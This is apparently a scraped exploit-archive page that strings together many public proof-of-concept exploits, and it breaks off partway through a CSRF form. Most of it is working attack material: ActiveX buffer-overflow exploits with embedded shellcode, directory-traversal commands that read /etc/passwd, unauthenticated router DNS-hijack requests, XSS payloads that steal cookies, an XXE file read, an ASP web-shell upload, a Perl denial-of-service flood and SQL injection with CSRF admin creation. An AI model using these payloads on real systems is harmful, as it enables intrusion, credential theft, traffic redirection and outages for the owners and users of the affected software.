HireHackking

<html> <br>1 Click Audio Converter Activex Buffer Overflow</br> <br>Affected version=2.3.6</br> <br>Vendor Homepage:http://www.dvdvideotool.com/index.htm</br> <br>Software Link:www.dvdvideotool.com/1ClickAudioConverter.exe</br> <br>The vulnerability lies in the COM component used by the product SkinCrafter.dll </br> <br>SkinCrafter.dll version.1.9.2.0</br> <br>Vulnerability tested on Windows Xp Sp3 (EN),with IE6</br> <br>Author: metacom</br> <!--Video Poc: http://bit.ly/1GmOAyq --> <object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' ></object> <script > junk1 = ""; while(junk1.length < 2048) junk1+="A"; nseh = "\xeb\x06\x90\x90"; seh = "\xD7\x51\x04\x10"; nops= ""; while(nops.length < 50) nops+="\x90"; shellcode =( "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+ "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+ "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+ "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+ "\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+ "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+ "\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+ "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+ "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+ "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+ "\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+ "\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+ "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+ "\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+ "\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+ "\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+ "\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+ "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+ "\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+ "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+ "\x4e\x46\x43\x36\x42\x50\x5a"); junk2 = ""; while(junk2.length < 2048) junk2+="B"; payload = junk1 + nseh + seh + nops+ shellcode + junk2; arg1=payload; arg1=arg1; arg2="defaultV"; arg3="defaultV"; arg4="defaultV"; arg5="defaultV"; target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 ); </script> </html>

# Exploit Title: WiFi HD 8.1 - Directory Traversal and Denial of Service # Date: 2015-05-27 # Exploit Author: Wh1t3Rh1n0 (Michael Allen) # Vendor Homepage: http://www.savysoda.com # Software Link: http://www.savysoda.com/WiFiHD/ # Version: 8.1 (Apr 1, 2015) # Tested on: iPhone Disclosure Timeline: * 2015-05-30: Vendor notified via email. * 2015-06-05: No reponse from the vendor. Advisory released. Software description: ===================== WiFi HD is an iOS app which allows users to share files between their iPhone and PC by running a web server, FTP server, or SMB server on the iPhone or through various cloud services. Vulnerabilities: ================ The web server (titled "WiFi" in the app) is vulnerable to multiple directory traversal issues which allow an attacker to download, upload, create, or delete any file to which the app has access. The SMB server (titled "Shared Folder") is vulnerable to a Denial of Service attack when issued the command, "dir -c", within smbclient. It also discloses a listing of all readable files within the iPhone's file system via the IPC$ share. Web Server Proof-of-Concept =========================== Read arbitrary files/folders: Read /etc/passwd: curl "http://[TARGET IP]/../../../../../../../../etc/passwd" List contents of the /tmp directory: curl "http://[TARGET IP]/../../../../../../../../tmp/" Create Folders: Create the folder, "/tmp/PoC-Folder": curl -d 'foldername=/../../../../../../../../tmp/PoC-Folder&button=Create+Folder' "http://[TARGET IP]/" Delete Files/Folders: Delete the folder, "/tmp/PoC-Folder": curl 'http://[TARGET IP]/!DEL!/../../../../../../../../tmp/PoC-Folder' Upload a File: Upload /etc/services to /tmp/example.txt: curl -F 'file=@/etc/services;filename=/../../../../../../../../tmp/example.txt' -F 'button=Submit' 'http://[TARGET IP]/' SMB Server Proof-of-Concept =========================== Denial of Service: smbclient -N -c 'dir \' //[TARGET IP]/IPC$ Browse the iPhone's Filesystem: smbclient -N //[TARGET IP]/IPC$

<html> <br>1 Click Extract Audio Activex Buffer Overflow</br> <br>Affected version=2.3.6</br> <br>Vendor Homepage:http://www.dvdvideotool.com/index.htm</br> <br>Software Link:www.dvdvideotool.com/1ClickExtractAudio.exe</br> <br>The vulnerability lies in the COM component used by the product SkinCrafter.dll </br> <br>SkinCrafter.dll version.1.9.2.0</br> <br>Vulnerability tested on Windows Xp Sp3 (EN),with IE6</br> <br>Author: metacom</br> <!--Video Poc: http://bit.ly/1SYwV3u --> <object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' ></object> <script > junk1 = ""; while(junk1.length < 2048) junk1+="A"; nseh = "\xeb\x06\xff\xff"; seh = "\x58\xE4\x04\x10"; nops= ""; while(nops.length < 50) nops+="\x90"; shellcode =( "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+ "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+ "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+ "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+ "\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+ "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+ "\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+ "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+ "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+ "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+ "\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+ "\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+ "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+ "\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+ "\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+ "\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+ "\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+ "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+ "\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+ "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+ "\x4e\x46\x43\x36\x42\x50\x5a"); junk2 = ""; while(junk2.length < 2048) junk2+="B"; payload = junk1 + nseh + seh + nops+ shellcode + junk2; arg1=payload; arg1=arg1; arg2="defaultV"; arg3="defaultV"; arg4="defaultV"; arg5="defaultV"; target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 ); </script> </html>

Broadlight Residential Gateway DI3124 Unauthenticated Remote DNS Change Copyright 2015 (c) Todor Donev <todor.donev at gmail.com> http://www.ethical-hacker.org/ https://www.facebook.com/ethicalhackerorg No description for morons, script kiddies & noobs !! Disclaimer: This or previous programs is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not Todor Donev's responsibility. Use them at your own risk! ShodanHQ Dork: Server: thttpd/2.25b 29dec2003 Content-Length: 348414 [todor@adamantium ~]$ GET "http://TARGET/cgi-bin/getdns.cgi?" {"success":true,"totalCount":2,"rows":[{"domain":"googleDNS1","serverip":"8.8.8.8","type":"manual"}, {"domain":"googleDNS2","serverip":"8.8.4.4","type":"manual"}]} [todor@adamantium ~]$ GET "http://TARGET/cgi-bin/savedns.cgi?domainname=evilDNS&domainserverip=133.71.33.7" {success:true,errormsg:"Operation Succeeded"} [todor@adamantium ~]$ GET "http://TARGET/cgi-bin/deldns.cgi?serverip=8.8.8.8" {success:true,errormsg:"Operation Succeeded"} [todor@adamantium ~]$ GET "http://TARGET/cgi-bin/deldns.cgi?serverip=8.8.4.4" {success:true,errormsg:"Operation Succeeded"} [todor@adamantium ~]$ GET "http://TARGET/cgi-bin/getconf.cgi" | egrep '(username|password)' <username>admin</username> <password>admin</password>

source: https://www.securityfocus.com/bid/53585/info The Unijimpe Captcha is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/captchademo.php/%22%3E%3Cscript%3Ealert%28%27pwned%27%29%3C/script%3E

source: https://www.securityfocus.com/bid/53586/info Artiphp is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Artiphp 5.5.0 Neo is vulnerable; other versions may also be affected. POST /artpublic/recommandation/index.php HTTP/1.1 Content-Length: 619 Content-Type: application/x-www-form-urlencoded Cookie: ARTI=tsouvg67cld88k9ihbqfgk3k77 Host: localhost:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) add_img_name_post "onmouseover=prompt(1) joxy adresse_destinataire adresse_expediteur lab%40zeroscience.mk asciiart_post "onmouseover=prompt(2) joxy expediteur "onmouseover=prompt(3) joxy message Hello%20World message1 %ef%bf%bd%20Recommand%20%ef%bf%bd%0a%bb%20http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f send Send titre_sav "onmouseover=prompt(4) joxy url_sav http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f z39d27af885b32758ac0e7d4014a61561 "onmouseover=prompt(5) joxy zd178e6cdc57b8d6ba3024675f443e920 2

source: https://www.securityfocus.com/bid/53602/info OpenKM is prone to a cross-site request-forgery vulnerability. Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected application. OpenKM 5.1.7 is vulnerable; other versions may also be affected. Login as administrator (having the AdminRole) and call the URL in a different browser window http://www.example.com/OpenKM/admin/scripting.jsp?script=String%5B%5D+cmd+%3 D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3E+%2Ftmp% 2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B Alternatively the administrator could browse a prepared HTML page in a new tab <html> <body> <script> img = new Image(); img.src="http://www.example.com/OpenKM/admin/scripting.jsp?script=String%5B% 5D+cmd+%3D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3 E+%2Ftmp%2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B" </script> </body> </html> The above exploit does nothing else than just creating a file in /tmp String[] cmd = {"/bin/sh", "-c", "/bin/echo pwned > /tmp/poc"}; Runtime.getRuntime().exec(cmd); Some might also want to browse directories http://www.example.com/OpenKM/admin/scripting.jsp?script=import+java.io.*%3B %0D%0A%0D%0Atry+%7B%0D%0A++++String+ls_str%3B%0D%0A++++Process+ls_proc+% 3D+Runtime.getRuntime%28%29.exec%28%22%2Fbin%2Fls+-lah%22%29%3B%0D%0A+++ +DataInputStream+ls_in+%3D+new+DataInputStream%28ls_proc.getInputStream% 28%29%29%3B%0D%0A%0D%0A++++while+%28%28ls_str+%3D+ls_in.readLine%28%29%2 9+%21%3D+null%29+++++++++++%0D%0A++++++++print%28ls_str+%2B+%22%3Cbr%3E% 22%29%3B%0D%0A%0D%0A%7D+catch+%28IOException+e%29+%7B%0D%0A%7D

source: https://www.securityfocus.com/bid/53595/info JIRA, and the Gliffy and Tempo plugins for JIRA are prone to a denial-of-service vulnerability because they fail to properly handle crafted XML data. Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an affected application. The following versions are affected: Versions prior to JIRA 5.0.1 are vulnerable. Versions prior to Gliffy 3.7.1 are vulnerable. Versions prior to Tempo versions 6.4.3.1, 6.5.1, and 7.0.3 are vulnerable. POST somehost.com HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" User-Agent: Jakarta Commons-HttpClient/3.1 Host: somehost.com Content-Length: 1577 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SecurityServer" xmlns:aut="http://authentication.integration.crowd.atlassian.com"> <soapenv:Header/> <soapenv:Body> <urn:authenticateApplication> <urn:in0> <aut:credential> <aut:credential>stuff1</aut:credential> <aut:encryptedCredential>?&lol9;</aut:encryptedCredential> </aut:credential> <aut:name>stuff3</aut:name> <aut:validationFactors> <aut:ValidationFactor> <aut:name>stuff4</aut:name> <aut:value>stuff5</aut:value> </aut:ValidationFactor> </aut:validationFactors> </urn:in0> </urn:authenticateApplication> </soapenv:Body> </soapenv:Envelope>

source: https://www.securityfocus.com/bid/53598/info PHP Address Book is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. PHP Address Book 7.0 is vulnerable; other versions may also be affected. http://www.example.com/addressbookv7.0.0/group.php/[XSS] http://www.example.com/addressbookv7.0.0/translate.php?lang=en&target_language=[XSS]

source: https://www.securityfocus.com/bid/53603/info The FishEye and Crucible plugins for JIRA are prone to an unspecified security vulnerability because they fail to properly handle crafted XML data. Exploiting this issue allows remote attackers to cause denial-of-service conditions or to disclose local sensitive files in the context of an affected application. FishEye and Crucible versions up to and including 2.7.11 are vulnerable. Burp Repeater Host: somehost.com Port 443 POST /crowd/services/test HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" User-Agent: Jakarta Commons-HttpClient/3.1 Host: somehost.com Content-Length: 2420 <!DOCTYPE foo [<!ENTITY xxec6079 SYSTEM "file:///etc/passwd"> ]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SecurityServer" xmlns:aut="http://authentication.integration.crowd.atlassian.com" xmlns:soap="http://soap.integration.crowd.atlassian.com"> <soapenv:Header/> <soapenv:Body> <urn:addAllPrincipals> <urn:in0> <!--Optional:--> <aut:name>?</aut:name> <!--Optional:--> <aut:token>?</aut:token> </urn:in0> <urn:in1> <!--Zero or more repetitions:--> <soap: SOAPPrincipalWithCredential> <!--Optional:--> <soap:passwordCredential> <!--Optional:--> <aut:credential>?</aut:credential> <!--Optional:--> <aut:encryptedCredential>?&xxec6079;</aut:encryptedCredential> </soap:passwordCredential> <!--Optional:--> <soap:principal> <!--Optional:--> <soap:ID>?</soap:ID> <!--Optional:--> <soap:active>?</soap:active> <!--Optional:--> <soap:attributes> <!--Zero or more repetitions:--> <soap:SOAPAttribute> <!--Optional:--> <soap:name>?</soap:name> <!--Optional:--> <soap:values> <!--Zero or more repetitions:--> <urn:string>?</urn:string> </soap:values> </soap:SOAPAttribute> </soap:attributes> <!--Optional:--> <soap:conception>?</soap:conception> <!--Optional:--> <soap:description>?</soap:description> <!--Optional:--> <soap:directoryId>?</soap:directoryId> <!--Optional:--> <soap:lastModified>?</soap:lastModified> <!--Optional:--> <soap:name>?</soap:name> </soap:principal> </soap:SOAPPrincipalWithCredential> </urn:in1> </urn:addAllPrincipals> </soapenv:Body> </soapenv:Envelope>

source: https://www.securityfocus.com/bid/53616/info Acuity CMS is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability. An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and run it in the context of the webserver process. Acuity CMS 2.6.2 is vulnerable; prior versions may also be affected. [REQUEST] POST /admin/file_manager/file_upload_submit.asp HTTP/1.1 Host: localhost Cookie: ASPSESSIONID=XXXXXXXXXXXXXXX -----------------------------6dc3a236402e2 Content-Disposition: form-data; name="path" /images -----------------------------6dc3a236402e2 Content-Disposition: form-data; name="rootpath" / -----------------------------6dc3a236402e2 Content-Disposition: form-data; name="rootdisplay" http://localhost/ -----------------------------6dc3a236402e2 Content-Disposition: form-data; name="status" confirmed -----------------------------6dc3a236402e2 Content-Disposition: form-data; name="action" fileUpload -----------------------------6dc3a236402e2 Content-Disposition: form-data; name="file1"; filename="0wned.asp" Content-Type: application/octet-stream <% response.write("0wned!") %> -----------------------------6dc3a236402e2--

source: https://www.securityfocus.com/bid/53622/info Yandex.Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Yandex.Server 2010 9.0 is vulnerable; other versions may also be affected. http://www.example.com/search/?text=%27);alert(document.cookie)//

source: https://www.securityfocus.com/bid/53616/info Acuity CMS is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability. An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and run it in the context of the webserver process. Acuity CMS 2.6.2 is vulnerable; prior versions may also be affected. http://www.example.com/admin/file_manager/browse.asp?field=&form=&path=../../

source: https://www.securityfocus.com/bid/53640/info Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input. 1. Multiple cross-site scripting vulnerabilities 2. An arbitrary-file-upload vulnerability 3. A denial-of-service vulnerability An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Concrete CMS versions 5.5 and 5.5.21 are vulnerable. Cross Site Scripting: 1) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/sitemap_search_selector?select_mode="><script>alert(1);</script> 2) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID="><script>alert(document.cookie);</script>&searchInstance=file1337335625 3) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID=13&searchInstance="><script>alert(document.cookie);</script> 3A)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=123&ocID=123&searchType=&searchInstance=&searchInstance=&ccm_order_by=fvDateAdded&ccm_order_dir=asc&searchType=123 &searchInstance="><script>alert(1);</script> www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=123&ocID=123&searchType=&searchInstance="><script>alert(1);</script> 4)(onmouseovervent) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=" onmouseover="alert(1)"&fKeywords=zssds&fsID[]=-1&numResults=10&searchField=&selectedSearchField[]= 4A)(without onmouseover event) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance="><script>alert(1);</script>&fKeywords=zssds&fsID[]=-1&numResults=10&searchField=&selectedSearchField[]= 5)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/sitemap_search_selector?select_mode=move_copy_delete&cID="><script>alert(1);</script> 6) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/edit?searchInstance=');</script><script>alert(document.cookie);</script>&fID=7 &fid=VALID_ID_OF_IAMGE 7)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/add_to?searchInstance="><script>alert(document.cookie);</script>&fID=owned 8)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/replace?searchInstance="><script>alert(document.cookie);</script>&fID=4 9)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/bulk_properties/?&fID[]=17&uploaded=true&searchInstance="><script>alert(document.cookie);</script> &fid=VALID_ID_OF_IAMGE 10)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/permissions?searchInstance="><script>alert("AkaStep");</script>&fID=owned 11)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id="><script>alert(1);</script>&node=owned&display_mode=full&select_mode=&selectedPageID= 11A) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node="><script>alert(1);</script>&display_mode=full&select_mode=&selectedPageID= 11B) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode="><script>alert(1);</script>&select_mode=&selectedPageID= 11C) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=owned&select_mode=owned&selectedPageID="><script>alert(1);</script> 11D) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=owned&select_mode="><script>alert(1);</script>&selectedPageID=owned (All parameters goes to page source without any sanitization +validation) 12)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_dialog?ocID="><script>alert(1);</script>&search=1 13)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/customize_search_columns?searchInstance="><script>alert(document.cookie);</script> Shell upload: #### p0c 1 [ Upload File via FlashUploader ] ###==> http://www.example.com/concrete/flash/thumbnail_editor_2.swf http://www.example.com/concrete/flash/thumbnail_editor_3.swf http://www.example.com/concrete/flash/swfupload/swfupload.swf http://www.example.com/concrete/flash/uploader/uploader.swf # Upload File/Shell Inj3ct0r.php;.gif DOS: #### p0c 2 [ DDos with RPC 'using simple PERL script]===> #!/usr/bin/perl use Socket; if (@ARGV < 2) { &usage } $rand=rand(10); $host = $ARGV[0]; $dir = $ARGV[1]; $host =~ s/(http:\/\/)//eg; for ($i=0; $i<66; $i--) { $user="w00t".$rand.$i; $data = "Aa" ; $lenx = length $data; $rpc = "POST ".$dir."concrete/js/tiny_mce/plugins/spellchecker/rpc.php HTTP/1.1\r\n". # Or use just /index.php "Accept: */*\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". "Host: $host\r\n". "Content-Length: $lenx\r\n". "Connection: Keep-Alive\r\n". "Cache-Control: no-cache\r\n\r\n". "$data"; my $port = "80"; my $proto = getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto); connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; send(SOCKET,"$rpc", 0); syswrite STDOUT, "+" ; } print "\n\n"; system('ping $host'); sub usage { print "\tusage: \n"; print "\t$0 <host> </dir/>\n"; print "\Ex: $0 127.0.0.1 /concrete/\n"; print "\Ex2: $0 target.com /\n\n"; exit(); }; # << ThE|End

source: https://www.securityfocus.com/bid/53640/info Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input. 1. Multiple cross-site scripting vulnerabilities 2. An arbitrary-file-upload vulnerability 3. A denial-of-service vulnerability An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Concrete CMS versions 5.5 and 5.5.21 are vulnerable. http://www.example.com/concrete/flash/thumbnail_editor_2.swf http://www.example.com/concrete/flash/thumbnail_editor_3.swf http://www.example.com/concrete/flash/swfupload/swfupload.swf http://www.example.com/concrete/flash/uploader/uploader.swf

D-Link DSL-2780B DLink_1.01.14 Unauthenticated Remote DNS Change Copyright 2015 (c) Todor Donev <todor.donev at gmail.com> http://www.ethical-hacker.org/ https://www.facebook.com/ethicalhackerorg No description for morons, script kiddies & noobs !! Disclaimer: This or previous programs is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not Todor Donev's responsibility. Use them at your own risk! [todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1" 0&> /dev/null <&1

Advisory ID: HTB23260 Product: ISPConfig Vendor: http://www.ispconfig.org Vulnerable Version(s): 3.0.5.4p6 and probably prior Tested Version: 3.0.5.4p6 Advisory Publication: May 20, 2015 [without technical details] Vendor Notification: May 20, 2015 Vendor Patch: June 4, 2015 Public Disclosure: June 10, 2015 Vulnerability Type: SQL Injection [CWE-89], Cross-Site Request Forgery [CWE-352] CVE References: CVE-2015-4118, CVE-2015-4119 Risk Level: High CVSSv2 Base Scores: 5.8 (AV:N/AC:L/Au:M/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered two vulnerabilities in a popular hosting control panel ISPConfig. The vulnerabilities can be exploited to execute arbitrary SQL commands in application database, perform a CSRF attack and gain complete control over the web application. 1) SQL Injection in ISPConfig: CVE-2015-4118 The vulnerability exists due to insufficient filtration of input data passed via the "server" HTTP GET parametre to "/monitor/show_sys_state.php" script before executing a SQL query. A remote authenticated attacker can pass arbitrary SQL commands to the vulnerable script and execute them in application’s database. Successful exploitation of this vulnerability will allow an attacker to read, insert and modify arbitrary records in database and compromise the entire web application, but requires the attacker to be authenticated and to have "monitor" privileges. However, in combination with the CSRF vulnerability to which the application is also vulnerable, this vulnerability becomes exploitable by remote non-authenticated attacker. A simple exploit below will display MySQL server version. First, use the following HTTP request to execute the SQL query: https://[host]/monitor/show_sys_state.php?state=server&server=-1%20UNION%20SELECT%201,version%28%29%20--%202|- After that visit the page mentioned below, the result of MySQL 'version()' function will be displayed in the HTML code of the page: https://[host]/monitor/show_data.php?type=mem_usage 2) CSRF (Cross-Site Request Forgery) in ISPConfig: CVE-2015-4119 The vulnerability exists due to failure in the "/admin/users_edit.php" script to properly verify the origin of the HTTP request. A remote attacker can create a specially crafted web page with CSRF exploit, trick a logged-in administrator to visit this page and create a new user with administrative privileges. A simple CSRF exploit below creates an administrative account with username "immuniweb" and password "immuniweb": <form action = "https://[host]/admin/users_edit.php" method = "POST" enctype = "multipart/form-data"> <input type="hidden" name="username" value="immuniweb"> <input 